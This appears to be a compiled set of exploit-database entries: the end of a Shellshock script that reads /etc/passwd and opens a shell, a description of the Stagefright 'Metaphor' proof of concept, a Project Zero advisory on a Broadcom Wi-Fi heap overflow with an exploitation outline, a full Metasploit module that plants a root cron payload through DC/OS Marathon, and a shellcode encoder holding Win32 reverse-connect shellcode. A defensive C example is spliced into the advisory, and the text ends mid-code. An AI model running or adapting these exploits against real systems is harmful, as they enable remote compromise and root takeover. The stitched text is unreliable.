= { "User-Agent": '() { test;};echo \"Content-type: text/plain\"; echo; echo; echo $(</etc/passwd)' } def exploit(): try: r = requests.get(url, headers=headers1, verify=False, timeout=5) except Exception, e: if 'timeout' in str(e): print "[+] Success. Enjoy your shell..." else: print "[-] Something is wrong..." print "[-] Error: " + str(e) def main(): try: r = requests.get(url, headers=headers2, verify=False, timeout=3) if r.content.startswith('\nroot:'): print "[+] Host is vulnerable, spawning shell..." time.sleep(3) exploit() else: print "[-] Host is not vulnerable, quitting..." sys.exit() except Exception, e: print "[-] Something is wrong..." print "[-] Error: " + str(e) if __name__ == "__main__": main()
  20. Source: https://github.com/NorthBit/Metaphor Metaphor - Stagefright with ASLR bypass By Hanan Be'er from NorthBit Ltd. Link to whitepaper: https://raw.githubusercontent.com/NorthBit/Public/master/NorthBit-Metaphor.pdf Twitter: https://twitter.com/High_Byte Metaphor's source code is now released! The source include a PoC that generates MP4 exploits in real-time and bypassing ASLR. The PoC includes lookup tables for Nexus 5 Build LRX22C with Android 5.0.1. Server-side of the PoC include simple PHP scripts that run the exploit generator - I'm using XAMPP to serve gzipped MP4 files. The attack page is index.php. The exploit generator is written in Python and used by the PHP code. usage: metaphor.py [-h] [-c CONFIG] -o OUTPUT {leak,rce,suicide} ... positional arguments: {leak,rce,suicide} Type of exploit to generate optional arguments: -h, --help show this help message and exit -c CONFIG, --config CONFIG Override exploit configuration -o OUTPUT, --output OUTPUT Credits: To the NorthBit team E.P. - My shining paladin, for assisting in boosting this project to achieve all the goals. Proof of Concept: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39640.zip
  21. Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1046
https://googleprojectzero.blogspot.ca/2017/04/over-air-exploiting-broadcoms-wi-fi_4.html

Broadcom produces Wi-Fi HardMAC SoCs which are used to handle the PHY and MAC layer processing. These chips are present in both mobile devices and Wi-Fi routers, and are capable of handling many Wi-Fi related events without delegating to the host OS.

One of the events handled by the BCM firmware is the processing of TDLS connections (802.11z). TDLS connections allow clients to exchange data between one another without passing it through the AP (thus preventing congestion at the AP).

In order to verify the integrity of TDLS messages, each message exchanged between the TDLS peers includes a message integrity code (MIC). The MIC is calculated using AES-CMAC with a key derived during the setup process (TPK-KCK).

When a TDLS Teardown Request frame is sent by either one of the peers in an established TDLS connection, the receiving client must verify the MIC before processing the request. The MIC for TDLS teardown requests is calculated as follows:

AES-CMAC(TPK-KCK, LinkID-IE || ReasonCode || DialogToken || TransactionSeq || FastTransition-IE)

(see "wpa_tdls_key_mic_teardown" under https://w1.fi/cgit/hostap/plain/src/rsn_supp/tdls.c)

It should be noted that all TDLS connections are accepted automatically from any peer and are handled solely by the BCM firmware (meaning there is no need for user interaction or involvement in any way - once a TDLS Setup Request is received by the firmware, it will proceed with the TDLS handshake and subsequently create a TDLS connection with the requesting peer).

When the BCM firmware receives a TDLS Teardown frame, it first verifies the Link-ID information element in order to make sure it matches the current link information. Then, if the Link ID is valid, it calls the "wlc_tdls_cal_teardown_mic_chk" function in order to verify the MIC of the request.
The function starts by extracting the Fast Transition IE information element (FTIE - number 55). Then, if the IE is present, its contents are copied into a heap-allocated buffer of length 256. The copy is performed using the length field present in the IE, and at a fixed offset from the buffer's start address. Since the length of the FTIE is not verified prior to the copy, this allows an attacker to include a large FTIE (e.g., with a length field of 255), causing the memcpy to overflow the heap-allocated buffer.

Here's the high-level logic of the "wlc_tdls_cal_teardown_mic_chk" function:

uint8_t* buffer = malloc(256);
...
uint8_t* linkid_ie = bcm_parse_tlvs(..., 101);
memcpy(buffer, linkid_ie, 0x14);
...
uint8_t* ft_ie = bcm_parse_tlvs(..., 55);
memcpy(buffer + 0x18, ft_ie, ft_ie[1] + 2);

(Note that each IE is a TLV; the tag and value fields are each a single byte long. Therefore, ft_ie[1] is the IE's length field).

It should also be noted that the heap implementation used in the BCM firmware does not perform safe unlinking or include heap header cookies, allowing heap overflows such as the one described above to be exploited more reliably.

I'm attaching a patch to wpa_supplicant 2.6 which modifies the TDLS Teardown frame sent by the supplicant in order to trigger the heap overflow. You can reproduce the issue by following these steps:

1. Download wpa_supplicant 2.6 from https://w1.fi/releases/wpa_supplicant-2.6.tar.gz
2. Apply the included patch file
3. Build wpa_supplicant (with TDLS support)
4. Use wpa_supplicant to connect to a network
5. Connect to wpa_cli:
   5.1. Setup a TDLS connection to the BCM peer using "TDLS_SETUP <MAC_ADDRESS_OF_PEER>"
   5.2. Teardown the connection using "TDLS_TEARDOWN <MAC_ADDRESS_OF_PEER>"

(Where MAC_ADDRESS_OF_PEER is the MAC address of a peer with a BCM SoC which is associated to the same network).

At this point the heap overflow will be triggered. The code in the patch will corrupt the heap, causing the remote BCM SoC to reset after a while.

I've been able to verify this vulnerability on the BCM4339 chip, running version 6.37.34.40 (as present on the Nexus 5). However, I believe this vulnerability's scope includes a wider range of Broadcom SoCs and versions.

patch

################################################################################

Attaching exploit - running exploit.py results in arbitrary code-execution on the Wi-Fi dongle.

Here is a high-level overview of the exploit:

1. Create a TDLS connection to the target device
2. Teardown the connection using a crafted "TDLS Teardown Request" frame, triggering the overflow
3. Create a new TDLS connection, using crafted arguments causing a situation where two chunks in the freelist overlap one another
4. Send a TDLS frame with action code 127
   4.1. Craft the size of the TDLS frame s.t. it overlaps the other chunk in the freelist
   4.2. Craft the contents in order to point the free chunk to the location of a periodic timer which was created during the firmware's initialization
5. Send another TDLS frame with action code 127
   5.1. Craft the size of the TDLS frame s.t. it will be placed on top of the timer object
   5.2. Craft the contents in order to replace the timer's data structures, allowing us to point the timer's handler function at any arbitrary address. In this case, we point the handler function at an address near the heap's end
6. Send a large TDLS frame with action code 127
   6.1. Craft the frame's contents so that it contains the shellcode we'd like to execute
7. Since the heap is zero-initialized, and "00 00" is NOP (MOVS R0,R0) in Thumb, this means that jumping to a location slightly before our created code chunk is fine, as it won't cause any adverse effects until we reach our code blob.

Putting all this together, once the timer expires, our code chunk is executed on the firmware.

Note that sending crafted "TDLS Teardown Request" frames requires modifications to wpa_supplicant. Moreover, sending TDLS frames with action code 127 requires modifications to both wpa_supplicant and to the Linux Kernel (mac80211). These changes (and instructions on how to apply them) are included in the exploit archive attached to this comment.

TDLSExploit-1.tar.gz

################################################################################

Attaching updated exploits for both the Nexus 5 (MRA58K, BCM4339 6.37.34.40) and the Nexus 6P (NUF26K, BCM4358 version 7.112.201.1).

TDLSExploit-2.tar.gz

################################################################################

Adding firmware heap visualisers.

-create_dot_graph.py - Creates a "dot" graph containing the heap's free-chunks
-create_html_main_chunk.py - Creates an HTML visualisation of the heap's main region
-create_html_total.py - Creates an HTML visualisation of the entire heap
-create_trace_html.py - Creates an HTML visualisation for traces from the malloc/free patches
-profiles.py - The symbols for each firmware "profile"
-utils.py - Utilities related to handling a firmware snapshot

BCMHeapVisualisers.tar.gz

################################################################################

Adding script to dump the timer list from a firmware snapshot.

dump_timers.py

################################################################################

Adding script to dump PCI ring information from firmware snapshot.

dump_pci.py

################################################################################

Adding inline firmware patcher.

-patch.py - The patcher itself.
-apply_* - Scripts to apply each of the patches using dhdutil
-<DEV>/BCMFreePatch - Patch for the "free" function in the firmware
-<DEV>/BCMMallocPatch - Patch for the "malloc" function in the firmware
-<DEV>/BCMDumpMPU - Patch that dumps the MPU's contents

BCMPatcher.tar.gz

Proofs of Concept: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41805.zip
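The root cause in the report is a memcpy whose length comes straight from the IE's own length byte. The following is an added example (not Project Zero's, Broadcom's or hostap's code) that puts a bounds-checked IE copy next to the unchecked pattern the report describes. The IE numbers 101 and 55, the 256-byte buffer, the 0x14-byte Link-ID copy and the 0x18 destination offset are taken from the report; the function names, the TLV walker and the sample frames are constructed for this illustration and are not the firmware's real layout.

```c
/* Added illustration: bounded vs. unbounded IE copy for a TDLS teardown frame.
 * Not firmware code; names and sample frames are constructed. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdbool.h>

#define IE_LINKID        101   /* Link Identifier IE number (from the report) */
#define IE_FTIE          55    /* Fast Transition IE number (from the report) */
#define LINKID_IE_DATA   18    /* 0x14 bytes on the wire = 2-byte header + 18 */
#define DST_BUF_LEN      256   /* heap buffer size named in the report */
#define FTIE_DST_OFFSET  0x18  /* fixed offset at which the FTIE is copied */

/* TLV walk that also validates every declared length against the frame,
 * so that ie[1] can never describe bytes outside the received frame. */
static const uint8_t *find_ie(const uint8_t *frame, size_t frame_len, uint8_t tag)
{
    size_t off = 0;
    while (off + 2 <= frame_len) {
        uint8_t t = frame[off];
        size_t  l = frame[off + 1];
        if (off + 2 + l > frame_len)
            return NULL;              /* truncated IE: reject the whole frame */
        if (t == tag)
            return frame + off;
        off += 2 + l;
    }
    return NULL;
}

/* The unchecked pattern: the copy length is ie[1] + 2, trusted as-is.
 * Only the length is computed here; no write is performed. */
size_t ftie_unchecked_copy_len(const uint8_t *ft_ie)
{
    return (size_t)ft_ie[1] + 2;
}

/* Hardened copy: the length is bounded by the space left in the destination. */
static bool copy_ie_checked(uint8_t *dst, size_t dst_len, size_t dst_off,
                            const uint8_t *ie)
{
    size_t n = (size_t)ie[1] + 2;
    if (dst_off > dst_len || n > dst_len - dst_off)
        return false;                 /* would overflow: refuse the frame */
    memcpy(dst + dst_off, ie, n);
    return true;
}

/* 1 = frame accepted, 0 = rejected (oversized or malformed IE),
 * -1 = required IE missing. Mirrors the two copies from the report. */
int process_teardown(const uint8_t *frame, size_t frame_len)
{
    uint8_t buffer[DST_BUF_LEN];
    memset(buffer, 0, sizeof buffer);

    const uint8_t *linkid = find_ie(frame, frame_len, IE_LINKID);
    const uint8_t *ftie   = find_ie(frame, frame_len, IE_FTIE);
    if (!linkid || !ftie)
        return -1;
    if (linkid[1] != LINKID_IE_DATA)  /* fixed-size IE: exact length only */
        return 0;
    memcpy(buffer, linkid, 2 + LINKID_IE_DATA);          /* 0x14 bytes */
    if (!copy_ie_checked(buffer, sizeof buffer, FTIE_DST_OFFSET, ftie))
        return 0;
    return 1;
}

/* Constructed sample frame: Link-ID IE followed by an FTIE of ftie_len bytes. */
static size_t build_teardown(uint8_t *out, size_t out_len, uint8_t ftie_len)
{
    size_t need = 2 + LINKID_IE_DATA + 2 + ftie_len, off = 0;
    if (need > out_len)
        return 0;
    out[off++] = IE_LINKID; out[off++] = LINKID_IE_DATA;
    memset(out + off, 0xAA, LINKID_IE_DATA); off += LINKID_IE_DATA;
    out[off++] = IE_FTIE;   out[off++] = ftie_len;
    memset(out + off, 0xBB, ftie_len);       off += ftie_len;
    return off;
}

/* A normal-sized FTIE (64 bytes) is accepted by the checked path. */
int demo_benign(void)
{
    uint8_t f[512];
    size_t n = build_teardown(f, sizeof f, 0x40);
    return process_teardown(f, n);
}

/* The 255-byte FTIE from the report is refused by the checked path... */
int demo_oversized(void)
{
    uint8_t f[512];
    size_t n = build_teardown(f, sizeof f, 255);
    return process_teardown(f, n);
}

/* ...while the unchecked length for the same frame is 257 bytes, more than
 * the 232 bytes (256 - 0x18) left in the destination buffer. */
size_t demo_oversized_unchecked_len(void)
{
    uint8_t f[512];
    build_teardown(f, sizeof f, 255);
    return ftie_unchecked_copy_len(f + 2 + LINKID_IE_DATA);
}
```

The two checks worth keeping from this are independent: `find_ie` refuses any IE whose declared length runs past the frame (an out-of-bounds read), and `copy_ie_checked` refuses any IE that does not fit in the remaining destination space (the out-of-bounds write from the report). The first check alone would not have prevented the overflow, because a 255-byte FTIE can be entirely inside a valid frame.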
  22. ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'DC/OS Marathon UI Docker Exploit',
      'Description'    => %q{
        Utilizing the DCOS Cluster's Marathon UI, an attacker can create a docker container
        with the '/' path mounted with read/write permissions on the host server that is
        running the docker container. As the docker container executes commands as uid 0 it
        is honored by the host operating system allowing the attacker to edit/create files
        owned by root. This exploit abuses this to create a cron job in the '/etc/cron.d/'
        path of the host server.

        *Notes: The docker image must be a valid docker image from hub.docker.com.
        Furthermore the docker container will only deploy if there are resources available
        in the DC/OS cluster.
      },
      'Author'         => 'Erik Daguerre',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'URL', 'https://warroom.securestate.com/dcos-marathon-compromise/'],
        ],
      'Targets'        =>
        [
          [ 'Python', {
            'Platform' => 'python',
            'Arch'     => ARCH_PYTHON,
            'Payload'  => { 'Compat' => { 'ConnectionType' => 'reverse noconn none tunnel' } }
          } ]
        ],
      'DefaultOptions' => { 'WfsDelay' => 75 },
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 03, 2017'))

    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('TARGETURI', [ true, 'Post path to start docker', '/v2/apps' ]),
        OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'python:3-slim' ]),
        OptString.new('CONTAINER_ID', [ false, 'container id you would like']),
        OptInt.new('WAIT_TIMEOUT', [ true, 'Time in seconds to wait for the docker container to deploy', 60 ])
      ])
  end

  def get_apps
    res = send_request_raw({
      'method' => 'GET',
      'uri'    => target_uri.path
    })
    return unless res and res.code == 200
    # verify it is marathon ui, and is returning content-type json
    return unless res.headers.to_json.include? 'Marathon' and res.headers['Content-Type'].include? 'application/json'
    apps = JSON.parse(res.body)
    apps
  end

  def del_container(container_id)
    res = send_request_raw({
      'method' => 'DELETE',
      'uri'    => normalize_uri(target_uri.path, container_id)
    })
    return unless res and res.code == 200
    res.code
  end

  def make_container_id
    return datastore['CONTAINER_ID'] unless datastore['CONTAINER_ID'].nil?
    rand_text_alpha_lower(8)
  end

  def make_cmd(mnt_path, cron_path, payload_path)
    vprint_status('Creating the docker container command')
    payload_data = nil
    echo_cron_path = mnt_path + cron_path
    echo_payload_path = mnt_path + payload_path
    cron_command = "python #{payload_path}"
    payload_data = payload.raw
    command = "echo \"#{payload_data}\" >> #{echo_payload_path}\n"
    command << "echo \"PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin\" >> #{echo_cron_path}\n"
    command << "echo \"\" >> #{echo_cron_path}\n"
    command << "echo \"* * * * * root #{cron_command}\" >> #{echo_cron_path}\n"
    command << "sleep 120"
    command
  end

  def make_container(mnt_path, cron_path, payload_path, container_id)
    vprint_status('Setting container json request variables')
    container_data = {
      'cmd'       => make_cmd(mnt_path, cron_path, payload_path),
      'cpus'      => 1,
      'mem'       => 128,
      'disk'      => 0,
      'instances' => 1,
      'id'        => container_id,
      'container' => {
        'docker' => {
          'image'   => datastore['DOCKERIMAGE'],
          'network' => 'HOST',
        },
        'type'    => 'DOCKER',
        'volumes' => [
          {
            'hostPath'      => '/',
            'containerPath' => mnt_path,
            'mode'          => 'RW'
          }
        ],
      },
      'env'    => {},
      'labels' => {}
    }
    container_data
  end

  def check
    return Exploit::CheckCode::Safe if get_apps.nil?
    Exploit::CheckCode::Appears
  end

  def exploit
    if get_apps.nil?
      fail_with(Failure::Unknown, 'Failed to connect to the targeturi')
    end

    # create required information to create json container information.
    cron_path = '/etc/cron.d/' + rand_text_alpha(8)
    payload_path = '/tmp/' + rand_text_alpha(8)
    mnt_path = '/mnt/' + rand_text_alpha(8)
    container_id = make_container_id()

    res = send_request_raw({
      'method' => 'POST',
      'uri'    => target_uri.path,
      'data'   => make_container(mnt_path, cron_path, payload_path, container_id).to_json
    })
    fail_with(Failure::Unknown, 'Failed to create the docker container') unless res and res.code == 201
    print_status('The docker container is created, waiting for it to deploy')
    register_files_for_cleanup(cron_path, payload_path)

    sleep_time = 5
    wait_time = datastore['WAIT_TIMEOUT']
    deleted_container = false
    print_status("Waiting up to #{wait_time} seconds for docker container to start")
    while wait_time > 0
      sleep(sleep_time)
      wait_time -= sleep_time
      apps_status = get_apps
      fail_with(Failure::Unknown, 'No apps returned') unless apps_status
      apps_status['apps'].each do |app|
        next if app['id'] != "/#{container_id}"
        if app['tasksRunning'] == 1
          print_status('The docker container is running, removing it')
          del_container(container_id)
          deleted_container = true
          wait_time = 0
        else
          vprint_status('The docker container is not yet running')
        end
        break
      end
    end

    # If the docker container does not deploy remove it and fail out.
    unless deleted_container
      del_container(container_id)
      fail_with(Failure::Unknown, "The docker container failed to start")
    end
    print_status('Waiting for the cron job to run, can take up to 60 seconds')
  end
end
  23. /*
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
Alphanumeric Shellcode Encoder Decoder
Copyright © 1985-2008 Avri Schneider - Aladdin Knowledge Systems, Inc. All rights reserved.

This program is free software: you can redistribute it and/or modify it under the terms of the
GNU General Public License as published by the Free Software Foundation, either version 3 of the
License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.

You should have received a copy of the GNU General Public License along with this program.
If not, see <http://www.gnu.org/licenses/gpl-3.0.html>.

+-----------+
WORKS CITED
+-----------+
+--------------------------------------------------------------------------------------------------+
|Matt Conover, Soren Macbeth, Avri Schneider 05 October 2004                                       |
|Encode2Alnum (polymorphic alphanumeric decoder/encoder)                                           |
|Full-Disclosure <http://lists.grok.org.uk/pipermail/full-disclosure/2004-October/027147.html>     |
|                                                                                                  |
|CLET Team. Aug. 2003                                                                              |
|Polymorphic Shellcode Engine                                                                      |
|Phrack <http://www.phrack.org/show.php?p=61&a=9>                                                  |
|                                                                                                  |
|Ionescu, Costin. 1 July 2003                                                                      |
|Re: GetPC code (was: Shellcode from ASCII)                                                        |
|Vuln-Dev <http://www.securityfocus.com/archive/82/327348>                                         |
|                                                                                                  |
|rix. Aug. 2001                                                                                    |
|Writing ia32 alphanumeric shellcodes                                                              |
|Phrack <http://www.phrack.org/show.php?p=57&a=15>                                                 |
|                                                                                                  |
|Wever, Berend-Jan. 28 Jan. 2001                                                                   |
|Alphanumeric GetPC code                                                                           |
|Vuln-Dev <http://www.securityfocus.com/archive/82/351528>                                         |
|ALPHA3 <http://skypher.com/wiki/index.php?title=ALPHA3>                                           |
+--------------------------------------------------------------------------------------------------+
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
*/

#include <time.h>
#include <stdio.h>
#include <windows.h>

#define MAX_BYTES 0x100
#define MAX_ENCODED_SHELLCODE 2000 //this will be allocated on the stack
#define MIN_IP_STR_LEN 7
#define MAX_IP_STR_LEN 15
#define OFFSET_XOR_AL1_A 15
#define OFFSET_XOR_AL1_B 18
#define OFFSET_XOR_AL2_A 37
#define OFFSET_XOR_AL2_B 40
#define OFFSET_PUSH_DWORD1 0
#define OFFSET_PUSH_DWORD2 1
#define OFFSET_PUSH_DWORD3 4
#define OFFSET_PUSH_DWORD4 12
#define OFFSET_RANDOMIZED_DECODER_HEAD 14
#define SIZE_RANDOMIZED_DECODER_HEAD 16

BYTE EncodedShellcode[] = // encoded 336 bytes
"PZhUQPTX5UQPTHHH4D0B8RYkA9YA3A9A2B90B9BhPTRWX5PTRW4r8B9ugxPqy8xO"
"wck4WTyhlLlUjyhukHqGCixVLt4UTCBRwsV3pRod8OLMKO9FXJVTJJbJX4gsVXAt"
"Q3ukAxFmVIw7HyBfDyNv5zXqg4PQeTxZJLm56vRjSidjSz75mHb2RL5Hl30tUmnH"
"HtXEv7oZVdiEv1QwWijcgVk4CZn7NI3uRai32AZ7FS0Iq1cwWc5T5RlnTIiKJVmq"
"4T4MElucobfP4vWyB0OfB34JRJ9T4zjLlbKmlk7jTicj11869F001uAdTZKNJ7wL"
"mOv5mLlGPKFLtNI2525WhktKDO0NIlseHIuJ33xv7xGQAW55eZKXHw78zfvCI2U0"
"9Ulw5ZZhynmxG7JZZgJAYbg1MEp5QcOv7AYkYfcHQDWVMlJnzOSh8nzg1NZZn5Px"
"11U5INVEtvZOS1E094HqmbB6K1MfRIq7KQyNOeL7NHI1Xnwhyhy69bg2bTexGnkc"
"CEt90vn3DaFxGaFuRIPg0NK40kdg0L9ImaFbGy1Wl7JyGeJByHdfRCSYzvCzVa2v"
"RtQWG5lxRMN1CZREvyKFvfwij3X2P81J1wk9ZLmGAqxGPuQv7RBX411iaWKCLGnD"
"kwRZKREaRis5V7c5ILxKfAx6MbH40T53PnX9ZwSWtYzbHwCzkS0Ev5iVmLmS3xSk"
"1telLPYuGyNvX1TyJ3yLdOwckr";

// example: make encoder choose more uppercase bytes...
#define ADDITIONAL_CHARSET "ABCDEFGHIJKLMNOPQRSTUVWXYZ" #define ALNUM_CHARSET ADDITIONAL_CHARSET "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" // <--- allowed charset // feel free to //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////change - YMMV #define REGISTER_WITH_ADDRESS_OF_SHELLCODE esp // <--- change this to the register holding the address of the decoder//////////// #define _Q(str) #str #define Q(str) _Q(str) #define P(str) #str ##" // <--- buffer offset\n"## _Q(str) /////////////////////////////////// #define CONNECT_BACK_SHELLCODE // //#undef CONNECT_BACK_SHELLCODE //undefine CONNECT_BACK_SHELLCODE to use your own - and place it in shellcode[] >-----------------. /////////////////////////////////////////////////////////////////// | int main(); // | UCHAR *scan_str_known_pattern(UCHAR *alnum_str, UCHAR *known_pattern, UINT known_pattern_length); // | UCHAR get_push_register_instruction(UCHAR *reg); // | UCHAR get_random_alnum_value(); // | UCHAR get_random_alnum_push_dword_opcode(); // | UCHAR *get_nop_slide(UINT size, UINT slide); /////// | UCHAR *slide_substr_forward(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide);// | UCHAR *slide_substr_back(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide); // | UCHAR *shuffle(UCHAR str[], UINT length); /////// | DWORD my_htonl(DWORD dw_in); // | DWORD ip_str_to_dw(UCHAR *str); // | BOOL terminating_key_exist(UCHAR *alnum_shellcode, UCHAR *terminating_key); // | BOOL is_alnum(UCHAR c); // | BOOL str_is_alnum(UCHAR *str); // | UCHAR get_two_xor_complemets_for_byte_and_xor(UCHAR byte, UCHAR xor, int index); // | UCHAR *randomize_decoder_head(UCHAR *decoder, UINT size_decoder, UCHAR xor_al1, UCHAR jne_xor1); // | struct xor2_key *get_xor2_and_key_for_xor1_and_c(UCHAR xor1, UCHAR c); // | struct xor2_key *choose_random_node(struct xor2_key *head); // | void free_p_xor2_key(struct 
xor2_key *node); // | // | struct xor2_key { // | UCHAR xor2; // | UCHAR key; // | struct xor2_key *prev; // | struct xor2_key *next; // | } xor2_key; // | // | // | // Title: Win32 Reverse Connect // | // Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003 // | // Author: hdm[at]metasploit.com // | #ifdef CONNECT_BACK_SHELLCODE // | #define OFFSET_IP_ADDRESS 154 // | #define OFFSET_TCP_PORT_NUMBER 159 // | #define IP_ADDRESS "127.0.0.1" // | #define TCP_PORT_NUMBER 123 // | DWORD ip_address; // | UCHAR shellcode[] = // | "\xe8\x30\x00\x00\x00\x43\x4d\x44\x00\xe7\x79\xc6\x79\xec\xf9\xaa" // | "\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x8e\x4e\x0e\xec\x7e\xd8\xe2" // | "\x73\xad\xd9\x05\xce\x72\xfe\xb3\x16\x57\x53\x32\x5f\x33\x32\x2e" // | "\x44\x4c\x4c\x00\x01\x5b\x54\x89\xe5\x89\x5d\x00\x6a\x30\x59\x64" // | "\x8b\x01\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x58\x08\xeb\x0c\x8d\x57" // | "\x24\x51\x52\xff\xd0\x89\xc3\x59\xeb\x10\x6a\x08\x5e\x01\xee\x6a" // | "\x08\x59\x8b\x7d\x00\x80\xf9\x04\x74\xe4\x51\x53\xff\x34\x8f\xe8" // | "\x83\x00\x00\x00\x59\x89\x04\x8e\xe2\xeb\x31\xff\x66\x81\xec\x90" // | "\x01\x54\x68\x01\x01\x00\x00\xff\x55\x18\x57\x57\x57\x57\x47\x57" // | "\x47\x57\xff\x55\x14\x89\xc3\x31\xff\x68" // | "IPIP" // I.P. 
address // | "\x68" // | "PORT" // TCP port number // | "\x89\xe1\x6a\x10\x51\x53\xff\x55\x10\x85\xc0\x75\x44\x8d\x3c\x24" // | "\x31\xc0\x6a\x15\x59\xf3\xab\xc6\x44\x24\x10\x44\xfe\x44\x24\x3d" // | "\x89\x5c\x24\x48\x89\x5c\x24\x4c\x89\x5c\x24\x50\x8d\x44\x24\x10" // | "\x54\x50\x51\x51\x51\x41\x51\x49\x51\x51\xff\x75\x00\x51\xff\x55" // | "\x28\x89\xe1\x68\xff\xff\xff\xff\xff\x31\xff\x55\x24\x57\xff\x55" // | "\x0c\xff\x55\x20\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c\x8b" // | "\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32\x49" // | "\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07\xc1" // | "\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24\x01" // | "\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\xeb" // | "\x02\x31\xc0\x89\xea\x5f\x5e\x5d\x5b\xc2\x08\x00"; // | #else ////////////////////////////////////// | UCHAR shellcode[] = "\xCC YOUR SHELLCODE GOES HERE \xCC"; // <----------------- here ------------------------------------------' #endif // DWORD size = sizeof(shellcode)-1; // // int main() { ///////////////////////////////////////////////////////// //(decoder address is in ecx when decoder starts) // UCHAR PUSH_REGISTER_WITH_DECODER_ADDRESS = get_push_register_instruction(Q(REGISTER_WITH_ADDRESS_OF_SHELLCODE)); // >----------. // // | #define END_OF_ENCODED_SHELLCODE 'A','L','D','N' // this is the terminating string of the encoded shellcode // | UCHAR str_end_of_encoded_shellcode[]= {END_OF_ENCODED_SHELLCODE}; //////////////////////////////////////////////// | UCHAR xor_al1 = get_random_alnum_value(); // this is used to zero out AL the first time | UCHAR xor_al2 = get_random_alnum_value(); // this is used to zero out AL the second time | int offset_imul_key = '\xC1';//////////////////////// | int jne_xor1 = '\xC2';// >---------------------------------------------------------. 
| int jne_xor2 = '\xC3';// >--------------------------------------------------------------| | // you would need to play with these two values if you want to reduce | | // the size of the NOP slides - they obviously need to stay alnum. | | // You could also play with the value of AL before the XOR is done | | // to get your desired negative offset. keep in mind that it will cost | | // you instructions to get al to the value you want (if you use xor of | | // two alphanumeric bytes, you would need to push first alphanumeric | | // char to the stack, pop eax, then xor it with it's alnum complement) | | // This playing around would result in an even harder to detect decoder | | // as the offsets would be different | | int size_decoder ='\xC4'; // | | int half_size_decoder ='\xC5'; //////////////////////////////////////////////////////////////////// | | UCHAR imul_instruction_1 ='\x6B'; // | | UCHAR imul_instruction_2 ='\x41'; // | | UCHAR imul_instruction_3 ='\xC6'; //size of decoder+1 // | | UCHAR imul_instruction_4 ='\xC7'; //initial key (random alnum) // | | // // | | UINT column=0, i=0; /////////////////////////////// | | UCHAR *alnum = ALNUM_CHARSET; // | | UCHAR *p_alnum = alnum; // | | UCHAR decoder[] = // | | { //////////////////////////////////////////////////////////////////////////////// | | // | | //[step_1] -- multiply first encoded byte with key | | //[step_2] -- xor result of step_1 with second encoded byte to get the decoded byte | | // | | // Each binary byte is encoded into three alphanumeric bytes. | | // The first byte multipled by the third byte xor'ed against the second byte yeilds the original | | // binary byte. 
| | // | | // TODO: | | // .--(first byte ^ second byte) * third byte | | // '--(second byte ^ first byte) * third byte | | // | | // .--(first byte ^ third byte) * second byte | | // '--(third byte ^ first byte) * second byte | | // | | // .--(second byte ^ third byte) * first byte | | // '--(third byte ^ second byte) * first byte | | // | | // .--(first byte * second byte) ^ third byte | | // '--(second byte * first byte) ^ third byte | | // | | // .--(first byte * third byte) ^ second byte <-- decoder/encoder implemented | | // '--(third byte * first byte) ^ second byte <-- decoder implemented (same encoder) | | // | | // .--(second byte * third byte) ^ first byte | | // '--(third byte * second byte) ^ first byte | | // | | // | | // The above is divided into pairs, each pair has the same values (in parenthesis) just at different offsets, | | // and we can switch them around with no effect. Each option requires a different decoder, but each pair can use the | | // same encoder. | | // | | /////////// DECODER HEAD (will be randomized by sliding instructions) //////// >----------------------------------|----|---. /* 1*/ '\x50', //push ??? (this can change) // [eax = address of decoder]------+ | | | /* 2*/ '\x50', //push ??? (this can change) // [ecx = address of decoder]------+ | | | /* 3*/ PUSH_REGISTER_WITH_DECODER_ADDRESS, //push reg (decoder address) // [edx = address of decoder]------+ | | | /* 4*/ PUSH_REGISTER_WITH_DECODER_ADDRESS, //push reg (base offset for cmp) // [ebx = address of decoder]------+ | | | /* 5*/ '\x50', //push ??? (this can change) // [esp = address of decoder]------+ | | | /* 7*/ '\x6A', half_size_decoder, //push 35h (word offset for cmp) // [ebp = decoder size / 2]--------+ | | | /*12*/ '\x68', END_OF_ENCODED_SHELLCODE, //push END_OF_ENCODED_SHELLCODE // [esi = 4 bytes terminating key]>+ | | | /*13*/ '\x50', //push ??? 
